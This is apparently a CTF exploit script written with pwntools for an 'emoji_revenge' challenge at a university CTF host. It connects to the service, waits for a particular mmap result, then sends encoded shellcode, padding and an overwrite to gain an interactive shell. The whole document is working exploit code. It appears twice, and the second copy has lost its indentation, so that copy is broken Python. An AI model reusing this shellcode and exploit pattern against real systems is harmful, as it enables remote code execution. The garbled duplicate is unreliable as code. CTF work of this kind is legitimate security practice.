0xKira/exp_emoji_revenge.py

## exp_emoji_revenge.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Kira / AAA"
from pwn import context, remote, process, ELF
from pwn import pause, log
import sys

context.update(terminal='zsh')
p = None
_remote = False


def init_buffer():
    p.sendlineafter('🐮🍺\n', '🍺')
    p.recvuntil('mmap() at @')


def exploit(host='', port=1337):
    global p, _remote
    if _remote:
        p = remote(host, port)
    else:
        p = process('./emoji_revenge', env={'LD_PRELOAD': ''})

    # context.log_level = 'debug'
    while True:
        init_buffer()
        addr = p.recvline().strip()
        if addr == '(nil)':
            break
    p.sendlineafter('🐮🍺\n', '🐴')
    p.recvline()
    # pause()
    w_sc = '\xfd\x9f\x95\xb6\xa1\xaa\xfd\xa2\x8b\xbb\xa1\x88\xfc\xaf\x8b\xb6\xb9\xa9\xfd\x88\x94\x87\x8c\xaf\xfd\x9f\x95\xbe\x9e\x89\xf9\x9a\x97\x89\xa8\xfc\xa4\x8d\x88\x84\x81\xf9\x80\x90\x84\x81\xfd\xaa\x95\xaf\x98\xb1\xfd\x9f\x95\xb5\xb8\x88\xfd\x96\xb9\xa0\x85\x88\xfc\xb1\xb9\xa8\xa5\x88\xfd\x98\x8e\xb6\xab\x92\xd4\x8f'
    payload = w_sc
    payload += 'A' * (0x80 - 56 // 4)
    payload += '\xef\xbb\xab\x00'   # \xeb\xfe inf loop
    payload = payload.ljust(0x10a, 'A')
    p.sendline(payload)

    p.interactive()


if __name__ == '__main__':
    if len(sys.argv) > 1 and sys.argv[1] == 'r':  # remote
        _remote = True
    exploit('chall.0ops.sjtu.edu.cn', 31323)
	#!/usr/bin/env python
	# -- coding: utf-8 --
	__author__ = "Kira / AAA"
	from pwn import context, remote, process, ELF
	from pwn import pause, log
	import sys

	context.update(terminal='zsh')
	p = None
	_remote = False


	def init_buffer():
	p.sendlineafter('🐮🍺\n', '🍺')
	p.recvuntil('mmap() at @')


	def exploit(host='', port=1337):
	global p, _remote
	if _remote:
	p = remote(host, port)
	else:
	p = process('./emoji_revenge', env={'LD_PRELOAD': ''})

	# context.log_level = 'debug'
	while True:
	init_buffer()
	addr = p.recvline().strip()
	if addr == '(nil)':
	break
	p.sendlineafter('🐮🍺\n', '🐴')
	p.recvline()
	# pause()
	w_sc = '\xfd\x9f\x95\xb6\xa1\xaa\xfd\xa2\x8b\xbb\xa1\x88\xfc\xaf\x8b\xb6\xb9\xa9\xfd\x88\x94\x87\x8c\xaf\xfd\x9f\x95\xbe\x9e\x89\xf9\x9a\x97\x89\xa8\xfc\xa4\x8d\x88\x84\x81\xf9\x80\x90\x84\x81\xfd\xaa\x95\xaf\x98\xb1\xfd\x9f\x95\xb5\xb8\x88\xfd\x96\xb9\xa0\x85\x88\xfc\xb1\xb9\xa8\xa5\x88\xfd\x98\x8e\xb6\xab\x92\xd4\x8f'
	payload = w_sc
	payload += 'A' * (0x80 - 56 // 4)
	payload += '\xef\xbb\xab\x00' # \xeb\xfe inf loop
	payload = payload.ljust(0x10a, 'A')
	p.sendline(payload)

	p.interactive()


	if __name__ == '__main__':
	if len(sys.argv) > 1 and sys.argv[1] == 'r': # remote
	_remote = True
	exploit('chall.0ops.sjtu.edu.cn', 31323)